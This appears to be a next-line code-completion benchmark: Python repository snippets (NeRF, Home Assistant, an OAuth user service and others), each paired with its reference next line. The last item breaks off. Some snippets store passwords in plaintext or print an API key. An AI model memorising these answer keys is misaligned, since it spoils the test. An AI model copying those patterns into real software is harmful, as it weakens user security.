prompt
stringlengths 1.74k
34.3k
| ref
stringlengths 4
432
|
---|---|
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: WU-CVGL/BAD-NeRFstudio
# Path: badnerf/cameras/badnerf_camera_optimizer.py
class BadNerfCameraOptimizerConfig(InstantiateConfig):
"""Configuration of BAD-NeRF camera optimizer."""
_target: Type = field(default_factory=lambda: BadNerfCameraOptimizer)
"""The target class to be instantiated."""
mode: Literal["off", "linear", "bspline"] = "off"
"""Pose optimization strategy to use.
linear: linear interpolation on SE(3);
bspline: cubic b-spline interpolation on SE(3)."""
num_virtual_views: int = 10
"""The number of samples used to model the motion-blurring."""
initial_noise_se3_std: float = 1e-5
"""Initial perturbation to pose delta on se(3). Must be non-zero to prevent NaNs."""
# Path: badnerf/data/badnerf_datamanager.py
class BadNerfDataManagerConfig(VanillaDataManagerConfig):
"""A depth datamanager - required to use with .setup()"""
_target: Type = field(default_factory=lambda: BadNerfDataManager)
# Path: badnerf/data/badnerf_dataparser.py
class BadNerfDataParserConfig(NerfstudioDataParserConfig):
"""Nerfstudio dataset config"""
_target: Type = field(default_factory=lambda: BadNerfDataParser)
"""target class to instantiate"""
scale_factor: float = 0.25
"""How much to scale the camera origins by."""
# Path: badnerf/engine/badnerf_trainer.py
class BadNerfTrainerConfig(TrainerConfig):
"""Configuration for BAD-NeRF training"""
_target: Type = field(default_factory=lambda: BadNerfTrainer)
pipeline: BadNerfPipelineConfig = BadNerfPipelineConfig()
"""BAD-NeRF pipeline configuration"""
# Path: badnerf/models/badnerfacto.py
class BadNerfactoModelConfig(NerfactoModelConfig):
"""BAD-NeRF-nerfacto Model Config"""
_target: Type = field(
default_factory=lambda: BadNerfactoModel
)
"""The target class to be instantiated."""
camera_optimizer: BadNerfCameraOptimizerConfig = BadNerfCameraOptimizerConfig()
"""Config of the camera optimizer to use"""
# Path: badnerf/pipelines/badnerf_pipeline.py
class BadNerfPipelineConfig(VanillaPipelineConfig):
"""BAD-NeRF pipeline config"""
_target: Type = field(default_factory=lambda: BadNerfPipeline)
num_virtual_views: int = 10
"""Number of virtual sharp images to re-blur"""
# Path: badnerf/badnerf_method_config.py
from nerfstudio.configs.base_config import ViewerConfig
from nerfstudio.engine.optimizers import AdamOptimizerConfig
from nerfstudio.engine.schedulers import ExponentialDecaySchedulerConfig
from nerfstudio.plugins.types import MethodSpecification
from badnerf.cameras.badnerf_camera_optimizer import BadNerfCameraOptimizerConfig
from badnerf.data.badnerf_datamanager import BadNerfDataManagerConfig
from badnerf.data.badnerf_dataparser import BadNerfDataParserConfig
from badnerf.engine.badnerf_trainer import BadNerfTrainerConfig
from badnerf.models.badnerfacto import BadNerfactoModelConfig
from badnerf.pipelines.badnerf_pipeline import BadNerfPipelineConfig
"""
BAD-NeRF config.
"""
badnerf_nerfacto = MethodSpecification(
config=BadNerfTrainerConfig(
method_name="bad-nerfacto",
steps_per_eval_all_images=500,
steps_per_save=2000,
max_num_iterations=30001,
mixed_precision=False,
use_grad_scaler=True,
| pipeline=BadNerfPipelineConfig( |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: nttcom/WASB-SBDT
# Path: src/runners/base.py
class BaseRunner:
def __init__(
self,
cfg: DictConfig,
):
self._cfg = cfg
log.info('run {}'.format(self._cfg['runner']['name']))
self._output_dir = cfg['output_dir']
def run(self):
raise NotImplementedError
# Path: src/runners/runner_utils.py
def train_epoch(epoch, model, train_loader, loss_criterion, optimizer, device):
batch_loss = AverageMeter()
model.train()
t_start = time.time()
for batch_idx, (imgs, hms) in enumerate(tqdm(train_loader, desc='[(TRAIN) Epoch {}]'.format(epoch)) ):
for scale, hm in hms.items():
hms[scale] = hm.to(device)
optimizer.zero_grad()
preds = model(imgs)
loss = loss_criterion(preds, hms)
loss.backward()
optimizer.step()
batch_loss.update(loss.item(), preds[0].size(0))
t_elapsed = time.time() - t_start
log.info('(TRAIN) Epoch {epoch} Loss:{batch_loss.avg:.6f} Time:{time:.1f}(sec)'.format(epoch=epoch, batch_loss=batch_loss, time=t_elapsed))
return {'epoch':epoch, 'loss':batch_loss.avg}
# Path: src/runners/runner_utils.py
@torch.no_grad()
def test_epoch(epoch, model, dataloader, loss_criterion, device, cfg, vis_dir=None):
batch_loss = AverageMeter()
model.eval()
t_start = time.time()
for batch_idx, (imgs, hms, trans, xys_gt, visis_gt, img_paths) in enumerate(tqdm(dataloader, desc='[(TEST) Epoch {}]'.format(epoch))):
imgs = imgs.to(device)
for scale, hm in hms.items():
hms[scale] = hm.to(device)
preds = model(imgs)
loss = loss_criterion(preds, hms)
batch_loss.update(loss.item(), preds[0].size(0))
t_elapsed = time.time() - t_start
log.info('(TEST) Epoch {epoch} Loss:{batch_loss.avg:.6f} Time:{time:.1f}(sec)'.format(epoch=epoch, batch_loss=batch_loss, time=t_elapsed))
return {'epoch': epoch, 'loss':batch_loss.avg }
# Path: src/runners/train_and_test.py
import os
import os.path as osp
import shutil
import time
import logging
import hydra
import numpy as np
import torch
from tqdm import tqdm
from omegaconf import DictConfig, OmegaConf
from hydra.core.hydra_config import HydraConfig
from torch import nn
from models import build_model
from dataloaders import build_dataloader
from losses import build_loss_criteria
from optimizers import build_optimizer_and_scheduler
from utils import save_checkpoint, set_seed, mkdir_if_missing, count_params, AverageMeter
from .inference_videos import VideosInferenceRunner
from .base import BaseRunner
from .runner_utils import train_epoch, test_epoch
log = logging.getLogger(__name__)
def update_fp1_example(epoch,
model,
vi_runner,
fp1_fpath,
):
vi_results = vi_runner.run(model=model)
print(vi_results['fp1_im_list_dict'])
print(fp1_fpath)
fp1_im_list_dict = vi_results['fp1_im_list_dict']
with open(fp1_fpath, 'w') as f:
for key, im_list in fp1_im_list_dict.items():
for path in im_list:
f.write('{}\n'.format(path))
fp1_fpath_current = osp.splitext(fp1_fpath)[0] + '_{}.txt'.format(epoch)
shutil.copyfile(fp1_fpath, fp1_fpath_current)
| class Trainer(BaseRunner): |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: barkure/white-dove-backend
# Path: db.py
DATABASE_URL = "sqlite:///./data.db"
# Path: models.py
class Users(Base):
__tablename__ = "Users"
# fields
user_id = Column(Integer,primary_key=True, index=True)
userName = Column(String(20))
password = Column(String(20))
email = Column(String(20))
GitHub_id = Column(String(20))
# Path: models.py
class BlogSettings(Base):
__tablename__ = "BlogSettings"
# fields
setting_id = Column(Integer,primary_key=True, index=True)
blogName = Column(String(100))
faviconName = Column(String(100))
# Path: services/auth_utils.py
def create_access_token(data: dict, expires_delta: timedelta):
to_encode = data.copy()
expire = datetime.utcnow() + expires_delta
to_encode.update({"exp": expire})
encoded_jwt = jwt.encode(to_encode, SECRET_KEY, algorithm=ALGORITHM)
return encoded_jwt
# Path: config.py
GITHUB_CLIENT_ID = os.getenv("GITHUB_CLIENT_ID")
# Path: config.py
GITHUB_CLIENT_SECRET = os.getenv("GITHUB_CLIENT_SECRET")
# Path: config.py
ACCESS_TOKEN_EXPIRE_MINUTES = int(os.getenv("ACCESS_TOKEN_EXPIRE_MINUTES")) # 默认24小时
# Path: services/users.py
from datetime import timedelta
from db import SessionLocal
from models import Users, BlogSettings
from services.auth_utils import create_access_token
from config import GITHUB_CLIENT_ID, GITHUB_CLIENT_SECRET, ACCESS_TOKEN_EXPIRE_MINUTES
import requests
"email": user.email,
"GitHub_id": user.GitHub_id
}
else:
return ["User not found"]
# 更新用户
def update_user(payload: dict):
user_id = payload.get("user_id")
userName = payload.get("userName")
password = payload.get("password")
email = payload.get("email")
GitHub_id = payload.get("GitHub_id")
db = SessionLocal()
user = db.query(Users).filter(Users.user_id == user_id).first()
if user:
if userName is not None:
user.userName = userName
if password is not None:
user.password = password
if email is not None:
user.email = email
if GitHub_id is not None:
user.GitHub_id = GitHub_id
db.commit()
db.close()
return {
"update_yes": True,
}
else:
db.close()
return {
"update_yes": False,
}
# 删除用户
def delete_user(payload: dict):
user_id = payload.get("user_id")
db = SessionLocal()
user = db.query(Users).filter(Users.user_id == user_id).first()
if user:
db.delete(user)
db.commit()
db.close()
return "User deleted"
else:
db.close()
return "User not found"
# 查询所有用户
def get_all_users():
db = SessionLocal()
all_users = db.query(Users).all()
db.close()
user_list = []
for user in all_users:
user_dict = {
"user_id": user.user_id,
"userName": user.userName,
"email": user.email,
"GitHub_id": user.GitHub_id
}
user_list.append(user_dict)
return user_list
# 登录验证
def login(payload: dict):
userNameOrEmail = payload.get("userNameOrEmail")
password = payload.get("password")
db = SessionLocal()
user = db.query(Users).filter((Users.userName == userNameOrEmail) | (Users.email == userNameOrEmail)).first()
db.close()
if user:
if user.password == password:
access_token_expires = timedelta(minutes=ACCESS_TOKEN_EXPIRE_MINUTES)
access_token = create_access_token(data={"sub": user.userName}, expires_delta=access_token_expires)
return {
"login_yes": True,
"token": access_token,
"userName": user.userName,
"email": user.email,
"user_id": user.user_id,
"GitHub_id": user.GitHub_id
}
else:
return {
"login_yes": False,
"token": None,
}
else:
return {
"login_yes": False,
"token": None,
}
# 绑定 GitHub 账号
def bind_github(GitHub_id: str, user_id: int):
db = SessionLocal()
user = db.query(Users).filter(Users.user_id == user_id).first()
if user:
user.GitHub_id = GitHub_id
db.commit()
db.close()
return {
"bind_yes": True,
"GitHub_id": GitHub_id,
}
else:
db.close()
return {
"bind_yes": False,
}
# Github OAuth
def github_oauth(payload: dict):
code = payload.get("code")
user_id = payload.get("user_id")
operation = payload.get("operation") # 根据 operation 判断是登录还是绑定
print('Code:', code, 'Operation:', operation)
| resp1 = requests.post("https://github.com/login/oauth/access_token?"+"client_id="+GITHUB_CLIENT_ID+"&client_secret="+GITHUB_CLIENT_SECRET+"&code="+code, headers={"Accept": "application/json"}) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: BobaZooba/xllm-demo
# Path: xllm_demo/core/constants.py
DATASET_KEY = "antropic"
# Path: xllm_demo/core/constants.py
COLLATOR_KEY = "last_part"
# Path: xllm_demo/core/constants.py
TRAINER_KEY = "steps"
# Path: xllm_demo/core/constants.py
EXPERIMENT_KEY = "check_model"
# Path: xllm_demo/core/dataset.py
class AntropicDataset(BaseDataset):
_HF_DATASET_ID = "Anthropic/hh-rlhf"
@classmethod
def get_data(cls, config: DemoXLLMConfig) -> Tuple[List[RawSample], Optional[List[RawSample]]]:
rlhf_dataset = datasets.load_dataset(cls._HF_DATASET_ID)
parsed_data: Dict[str, List[RawSample]] = dict()
for split in ["train", "test"]:
parsed_data[split] = list()
for sample in tqdm(rlhf_dataset[split], desc=f"Parsing {split}"):
text_parts = sample[config.text_field].split("\n\n")[1:]
parsed_data[split].append(text_parts)
train = parsed_data["train"]
evaluation = parsed_data["test"]
return train, evaluation
def get_sample(self, index: int) -> RawSample:
sample = {
enums.General.text_parts: self.data[index]
}
return sample
# Path: xllm_demo/core/experiment.py
class MyExperiment(Experiment):
def before_model_build(self) -> None:
assert self.model is None
dist_logger.info("Model is not None", local_rank=self.config.local_rank)
def after_model_build(self) -> None:
assert self.model is not None
dist_logger.info("Model is not None", local_rank=self.config.local_rank)
def after_train(self) -> None:
if hasattr(self.model, "my_steps"):
num_steps = self.model.my_steps
dist_logger.info(f"Steps: {num_steps}", local_rank=self.config.local_rank)
# Path: xllm_demo/core/collator.py
class LastPartCollator(BaseCollator):
def parse_batch(self, raw_batch: List[RawSample]) -> Batch:
texts = list()
for sample in raw_batch:
item = sample[enums.General.text_parts]
# get just last text part
texts.append(item[-1])
tokenized = self.tokenizer(
texts,
return_tensors="pt",
padding=True,
truncation=True,
max_length=self.max_length,
)
batch = {
enums.Transformers.input_ids: tokenized.input_ids[:, :-1],
enums.Transformers.attention_mask: tokenized.attention_mask[:, :-1],
enums.Transformers.labels: tokenized.input_ids[:, 1:],
}
return batch
# Path: xllm_demo/core/trainer.py
class MyLMTrainer(LMTrainer):
def __init__(
self,
config: DemoXLLMConfig,
model: Union[PreTrainedModel, PeftModel],
args: TrainingArguments,
data_collator: BaseCollator,
train_dataset: BaseDataset,
ignore_index: int,
eval_dataset: Optional[BaseDataset] = None,
):
super().__init__(config, model, args, data_collator, train_dataset, ignore_index, eval_dataset)
self.my_steps = 0
def compute_loss(
self,
model: Union[PreTrainedModel, PeftModel],
inputs: Dict[str, Tensor],
return_outputs: bool = False,
) -> Union[Tensor, Tuple[Tensor, Dict[str, Tensor]]]:
self.my_steps += 1
return super().compute_loss(model=model, inputs=inputs, return_outputs=return_outputs)
# Path: xllm_demo/core/registry.py
from xllm.datasets import datasets_registry
from xllm.collators import collators_registry
from xllm.trainers import trainers_registry
from xllm.experiments import experiments_registry
from xllm_demo.core.constants import DATASET_KEY, COLLATOR_KEY, TRAINER_KEY, EXPERIMENT_KEY
from xllm_demo.core.dataset import AntropicDataset
from xllm_demo.core.experiment import MyExperiment
from xllm_demo.core.collator import LastPartCollator
from xllm_demo.core.trainer import MyLMTrainer
# Copyright 2023 Boris Zubarev. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
def components_registry():
datasets_registry.add(key=DATASET_KEY, value=AntropicDataset)
collators_registry.add(key=COLLATOR_KEY, value=LastPartCollator)
trainers_registry.add(key=TRAINER_KEY, value=MyLMTrainer)
| experiments_registry.add(key=EXPERIMENT_KEY, value=MyExperiment) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: Kiyliy/openai_speech_to_text
# Path: send_to_openai.py
def send_to_openai_api(api_key,url,audio_file_path)->str:
print("DEBUD: api_key:",api_key)
if not api_key or not url:
raise ValueError("API密钥和URL必须设置")
headers = {
'Authorization': f'Bearer {api_key}'
}
with open(audio_file_path, 'rb') as audio_file:
files = {'file': audio_file}
try:
response = requests.post(
url=url,
headers=headers,
files=files,
data={
'model': 'whisper-1',
"language": "zh",
"prompt": "respond in simplified Chinese"
},
timeout = 60 # 超时时间
)
if response.status_code == 200:
transcription = response.json()['text']
print("转录文本:", transcription)
logging.info("转录文本: %s\n", transcription)
return transcription
else:
#如果rate_limit
if(response.status_code == 429 and ("requests per day" in response.json()['error']['message']) ):
#临时删除这个key
import get_api_key
get_api_key.delete_key(api_key)
logging.info("API密钥已临时删除")
print("转录失败:", response.text)
except Exception as e:
logging.error(e)
return
# Path: send_to_openai.py
def paste_text(transcription):
# 复制文本到剪贴板
pyperclip.copy(transcription)
# 模拟按键粘贴文本
pyautogui.hotkey('ctrl', 'v')
# Path: openai_audio.py
import pyaudio
import wave
import requests
import json
import base64
import pyautogui
import threading
import logging
import pyperclip
import os
import random
import time
import get_api_key
from threading import Lock
from send_to_openai import send_to_openai_api , paste_text
logging.basicConfig(level=logging.INFO)
# 确保在模块加载时调用load_config
get_api_key.load_config()
# API和URL变量
api_key = get_api_key.get_api_key()
url = get_api_key.get_api_url()
# 录音参数
chunk = 1024
format = pyaudio.paInt16
channels = 1
rate = 44100
# 录音控制变量
is_recording = False
frames = []
frames_lock = Lock()
def start_recording():
global is_recording
with frames_lock:
if not is_recording:
is_recording = True
frames.clear()
threading.Thread(target=record).start()
else:
logging.info("录音已在进行中。")
def stop_recording():
global is_recording
with frames_lock:
if is_recording:
is_recording = False
else:
logging.info("录音已停止。")
def record():
global frames
logging.info("录音开始...")
p = pyaudio.PyAudio()
stream = p.open(format=format, channels=channels, rate=rate, input=True, frames_per_buffer=chunk)
try:
while is_recording:
data = stream.read(chunk)
with frames_lock:
frames.append(data)
except Exception as e:
logging.error(f"录音过程中出错: {e}")
finally:
stream.stop_stream()
stream.close()
p.terminate()
logging.info("录音结束...")
save_recording(frames, p)
def save_recording(frames, audio):
wf = wave.open('temp_audio.wav', 'wb')
wf.setnchannels(channels)
wf.setsampwidth(audio.get_sample_size(format))
wf.setframerate(rate)
wf.writeframes(b''.join(frames))
wf.close()
api_key = get_api_key.get_api_key()
transcription= send_to_openai_api(api_key,url,'temp_audio.wav')
| paste_text(transcription) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: globality-corp/deboiler
# Path: deboiler/logger.py
def logger(obj):
"""
logging decorator, assigning an object the `logger` property.
Can be used on a Python class, e.g:
@logger
class MyClass:
...
"""
obj.logger = logging.getLogger(obj.__name__)
return obj
# Path: deboiler/lxml_query.py
def get_candidate_nodes(parsed_content: LxmlTree) -> list[LxmlNode]:
"""
Get all nodes (matching the query) from the input Element.
These nodes are the candidate nodes that can be boilerplate.
"""
query = construct_query()
return parsed_content.xpath(query)
# Path: deboiler/models/lxml_node.py
class LxmlTree:
"""
A wrapper around the LXML _Element object of a parsed page
"""
def __init__(self, tree: _Element):
if not isinstance(tree, _Element):
raise ValueError("non _Element passed")
self.tree = tree
# Store a mapping of IDs to their LxmlNode wrapped objects
self.elements: Mapping[str, LxmlNode] = {}
# For each element, add a unique element
for i, node in enumerate(self.tree.iter()):
node_id = str(i)
node.attrib[NODE_IDENTIFIER_KEY] = node_id
self.elements[node_id] = LxmlNode(node, tree=self)
@property
def root(self):
return self.lxml_to_node(self.tree)
def clear_cache(self):
for element in self.elements.values():
element.clear_cache()
def xpath(self, *args, **kwargs):
results = self.tree.xpath(*args, **kwargs)
return self.lxml_to_nodes(results)
def lxml_to_nodes(self, elements: list[_Element]) -> list["LxmlNode"]:
"""
Converter class to take a list of lxml elements and
return a list of wrapper LxmlNode from our central registry.
"""
return [
node
for element in elements
for node in [self.lxml_to_node(element)]
if node is not None
]
def lxml_to_node(self, element: _Element) -> Optional["LxmlNode"]:
# We occasionally see elements that don't have an ID set; this is often
# due to some synthetic lxml objects like _ProcessingInstruction being
# found in the tree but refusing to save attrib changes that are attempted
# in the __init__ function of this tree class
#
# In these cases log a warning and bail out
if NODE_IDENTIFIER_KEY not in element.attrib:
debug(f"Unfound element: {element}")
return None
return self.elements[element.attrib[NODE_IDENTIFIER_KEY]]
# Path: deboiler/models/page.py
import re
from dataclasses import dataclass
from io import StringIO
from logging import Logger
from typing import Optional, Union
from lxml.etree import HTMLParser, _Element, parse as parse_html
from deboiler.logger import logger
from deboiler.lxml_query import get_candidate_nodes
from deboiler.models.lxml_node import LxmlTree
EMPTY_HTML = "<html></html>"
@dataclass
class RawPage:
"""
A crawled page with raw (string or binary) content.
"""
url: str
content: Union[bytes, str]
def __repr__(self):
return f"RawPage(url={self.url}, content={self.content[:20]}...)"
def parse(self):
return ParsedPage(self.url, self.content)
@logger
class ParsedPage:
"""
A parsed page.
It stores the parsed version (as an LxmlTree) of the given raw content.
nodes attribute is a cache of string representations for all the candidate nodes (subtrees)
in this page.
"""
logger: Logger
parser = HTMLParser(remove_comments=True)
def __init__(self, url: str, content: Union[bytes, str]):
self.url = url
self.content: LxmlTree = self.parse(content)
self.nodes: set[str] = {
# Set of normalized representations for all candidate nodes in the LxmlTree
node.normalized_representation()
| for node in get_candidate_nodes(self.content) |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: solovieff/kibernikto
# Path: kibernikto/plugins/_img_summarizator.py
def _is_image(url):
parsed = urlparse(url)
path = parsed.path
# Get the file extension from the path
ext = os.path.splitext(path)[1].lower()
# Check if the extension is a known image type
return ext in ['.jpg', '.jpeg', '.png', '.gif']
# Path: kibernikto/constants.py
OPENAI_MAX_TOKENS = int(os.environ.get('OPENAI_MAX_TOKENS', 800))
# Path: kibernikto/utils/text.py
async def get_website_as_text(url: HttpUrl):
to_reader_url = "https://toolsyep.com/en/webpage-to-plain-text/"
async with aiohttp.ClientSession() as session:
async with session.get(to_reader_url, params={
"u": url
}) as response:
html = await response.text(encoding=response.charset)
return html
# Path: kibernikto/utils/text.py
async def get_website_html(url: HttpUrl):
async with aiohttp.ClientSession() as session:
async with session.get(url) as response:
html = await response.text(encoding=response.charset)
return html
# Path: kibernikto/plugins/_kibernikto_plugin.py
class KiberniktoPlugin(ABC):
"""
Plugins get message as input and return processed message as output or None.
"""
def __init__(self, model: str, base_url: str, api_key: str,
base_message: str, post_process_reply=False,
store_reply=False):
"""
:param model:
:param base_url:
:param api_key:
:param base_message:
:param post_process_reply: if plugin reply should be used as input for further actions (i.e. other plugins)
:param store_reply: if the result should be stored in the messages storage at bot level
"""
self.post_process_reply = post_process_reply
self.store_reply = store_reply
self.model = model
self.base_message = base_message
self.client_async = AsyncOpenAI(base_url=base_url, api_key=api_key)
@abstractmethod
async def run_for_message(self, message: str) -> str:
pass
# Path: kibernikto/plugins/_kibernikto_plugin.py
class KiberniktoPluginException(Exception):
def __init__(self, plugin_name: str, error_message: str):
self.plugin_name = plugin_name
super().__init__(error_message)
# Path: kibernikto/plugins/_weblink_summarizator.py
import logging
import re
from kibernikto.plugins._img_summarizator import _is_image
from openai.types.chat import ChatCompletion
from kibernikto.constants import OPENAI_MAX_TOKENS
from kibernikto.utils.text import get_website_as_text, get_website_html
from ._kibernikto_plugin import KiberniktoPlugin, KiberniktoPluginException
class WeblinkSummaryPlugin(KiberniktoPlugin):
"""
This plugin is used to get video transcript and then get text summary from it.
"""
def __init__(self, model: str, base_url: str, api_key: str, summarization_request: str):
super().__init__(model=model, base_url=base_url, api_key=api_key, post_process_reply=False, store_reply=True,
base_message=summarization_request)
async def run_for_message(self, message: str):
try:
result = await self._run(message)
return result
except Exception as error:
logging.error(f'failed to get webpage data from {message}: {str(error)}', )
raise KiberniktoPluginException(plugin_name=self.__class__.__name__,
error_message='failed to get webpage data')
async def _run(self, message: str):
web_link, other_text = _extract_link(message)
if web_link is None:
return None
| if _is_image(web_link): |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: leeyuentuen/tibber_ev
# Path: custom_components/tibber_ev/const.py
MAX_CHARGE_RANGE = 375
# Path: custom_components/tibber_ev/entity.py
class TibberEVEntity(Entity):
def __init__(self, device: TibberApi) -> None:
"""Initialize the Tibber entity."""
self._device = device
self._attr_device_info = DeviceInfo(
identifiers={(Tibber_EV_DOMAIN, self._device.name)},
manufacturer="Tibber",
model=None,
name=device.name,
sw_version=None,
)
async def async_added_to_hass(self) -> None:
"""Add listener for state changes."""
await super().async_added_to_hass()
# Path: custom_components/tibber_ev/const.py
DOMAIN = "tibber_ev"
# Path: custom_components/tibber_ev/tibber.py
POST_HEADER_JSON = {"Content-Type": "application/json"}
_LOGGER = logging.getLogger(__name__)
QUERY_PAYLOAD = '{"query": "{ me { homes { electricVehicles {id name shortName lastSeen lastSeenText isAlive hasNoSmartChargingCapability imgUrl schedule {isEnabled isSuspended localTimeTo minBatteryLevel} batteryText chargingText consumptionText consumptionUnitText energyCostUnitText chargeRightAwayButton chargeRightAwayAlert {imgUrl title description okText cancelText}backgroundStyle energyDealCallToAction{text url redirectUrlStartsWith link action enabled} settingsScreen{settings {key value valueType valueIsArray isReadOnly inputOptions{type title description pickerOptions {values postFix} rangeOptions{max min step defaultValue displayText displayTextPlural} selectOptions {value title description imgUrl iconName isRecommendedOption} textFieldOptions{imgUrl format placeholder} timeOptions{doNotSetATimeText}}} settingsLayout{uid type title description valueText imgUrl iconName isUpdated isEnabled callToAction {text url redirectUrlStartsWith link action enabled} childItems{uid type title description valueText imgUrl iconName isUpdated isEnabled callToAction {text url redirectUrlStartsWith link action enabled} settingKey settingKeyForIsHidden} settingKey settingKeyForIsHidden}} settingsButtonText settingsButton {text url redirectUrlStartsWith link action enabled}enterPincode message {id title description style iconName iconSrc callToAction {text url redirectUrlStartsWith link action enabled} dismissButtonText} scheduleSuspendedText faqUrl battery { percent percentColor isCharging chargeLimit}}}}}"}'
class Tibber:
def __init__(self,
hass: HomeAssistant,
raw_data: str,
tibber_api: TibberApi) -> None:
async def init(self):
def status(self) -> str:
async def async_update(self):
# Path: custom_components/tibber_ev/sensor.py
import logging
from typing import Final
from dataclasses import dataclass
from datetime import timedelta
from .const import MAX_CHARGE_RANGE
from .entity import TibberEVEntity
from homeassistant.helpers.typing import StateType
from homeassistant import const
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant, callback
from homeassistant.components.sensor import (
SensorEntity,
SensorEntityDescription,
SensorStateClass,
SensorDeviceClass
)
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers import entity_platform
from . import DOMAIN as TIBBER_EV_DOMAIN
from .tibber import Tibber, TibberApi
from homeassistant.const import (
PERCENTAGE,
)
path="battery",
subpath="percent",
unit=PERCENTAGE,
round_digits=None,
state_class=SensorStateClass.MEASUREMENT,
device_class=SensorDeviceClass.BATTERY,
),
TibberSensorDescription(
key="battery_charge_limit",
name="battery charge limit",
icon="mdi:battery-plus-variant",
path="battery",
subpath="chargeLimit",
unit=PERCENTAGE,
round_digits=None,
state_class=SensorStateClass.TOTAL,
device_class=SensorDeviceClass.BATTERY,
),
TibberSensorDescription(
key="last_seen",
name="last seen",
icon="mdi:eye",
path="lastSeen",
subpath=None,
unit=None,
round_digits=None,
state_class=SensorStateClass.MEASUREMENT,
device_class=SensorDeviceClass.TIMESTAMP,
),
TibberSensorDescription(
key="last_seen_text",
name="last seen text",
icon="mdi:eye",
path="lastSeenText",
subpath=None,
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="is_charging",
name="is charging",
icon="mdi:battery-charging",
path="battery",
subpath="isCharging",
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="shortName",
name="shortname",
icon="mdi:rename-outline",
path="shortName",
subpath=None,
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="full_name",
name="full name",
icon="mdi:car",
path="name",
subpath=None,
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="is_alive",
name="Is alive",
icon="mdi:shield-account",
path="isAlive",
subpath=None,
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="schedule",
name="schedule",
icon="mdi:battery-clock",
path="schedule",
subpath=None,
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="id",
name="id",
icon="mdi:car",
path="id",
subpath=None,
unit=None,
round_digits=None,
),
TibberSensorDescription(
key="range",
name="Range",
icon="mdi:map-marker-distance",
path=None,
subpath=None,
unit="km",
round_digits=0,
state_class=SensorStateClass.MEASUREMENT,
device_class=SensorDeviceClass.DISTANCE,
),
)
async def async_setup_platform(
hass: HomeAssistant,
config: ConfigEntry,
async_add_entities: AddEntitiesCallback,
discovery_info=None):
pass
async def async_setup_entry(
hass: HomeAssistant,
entry: ConfigEntry,
async_add_entities: AddEntitiesCallback):
"""Set up using config_entry."""
# get the device
| tibberApi: TibberApi |
You will be given python files from a code repository, with the current file being shown last. Your task is to predict the next line of code in the current file.
NOTE: You should only predict the next line in the current file. Do not produce more than one line, and do not provide any explanation.
====REPOSITORY====
# Repo Name: bytedance/LapNet
# Path: lapnet/base_config.py
class SystemType(enum.IntEnum):
MOLECULE = enum.auto()
def has_value(cls, value):
def default() -> ml_collections.ConfigDict:
def resolve(cfg):
# Path: lapnet/utils/system.py
class Atom:
def _set_default_charge(self):
def _set_default_atomic_number(self):
def __attrs_post_init__(self):
def coords_angstrom(self):
def coords_array(self):
def element(self):
def pyscf_mol_to_internal_representation(
mol: pyscf.gto.Mole) -> ml_collections.ConfigDict:
# Path: lapnet/utils/system.py
class Atom:
"""Atom information for Hamiltonians.
The nuclear charge is inferred from the symbol if not given, in which case the
symbol must be the IUPAC symbol of the desired element.
Attributes:
symbol: Element symbol.
coords: An iterable of atomic coordinates. Always a list of floats and in
bohr after initialisation. Default: place atom at origin.
charge: Nuclear charge. Default: nuclear charge (atomic number) of atom of
the given name.
atomic_number: Atomic number associated with element. Default: atomic number
of element of the given symbol. Should match charge unless fractional
nuclear charges are being used.
units: String giving units of coords. Either bohr or angstrom. Default:
bohr. If angstrom, coords are converted to be in bohr and units to the
string 'bohr'.
coords_angstrom: list of atomic coordinates in angstrom.
coords_array: Numpy array of atomic coordinates in bohr.
element: elements.Element corresponding to the symbol.
"""
symbol = attr.ib(type=str)
coords = attr.ib(
type=Sequence[float],
converter=lambda xs: tuple(float(x) for x in xs),
default=(0.0, 0.0, 0.0))
charge = attr.ib(type=float, converter=float)
atomic_number = attr.ib(type=int, converter=int)
units = attr.ib(
type=str,
default='bohr',
validator=attr.validators.in_(['bohr', 'angstrom']))
@charge.default
def _set_default_charge(self):
return self.element.atomic_number
@atomic_number.default
def _set_default_atomic_number(self):
return self.element.atomic_number
def __attrs_post_init__(self):
if self.units == 'angstrom':
self.coords = [unit_conversion.angstrom2bohr(x) for x in self.coords]
self.units = 'bohr'
@property
def coords_angstrom(self):
return [unit_conversion.bohr2angstrom(x) for x in self.coords]
@property
def coords_array(self):
if not hasattr(self, '_coords_arr'):
self._coords_arr = np.array(self.coords)
return self._coords_arr
@property
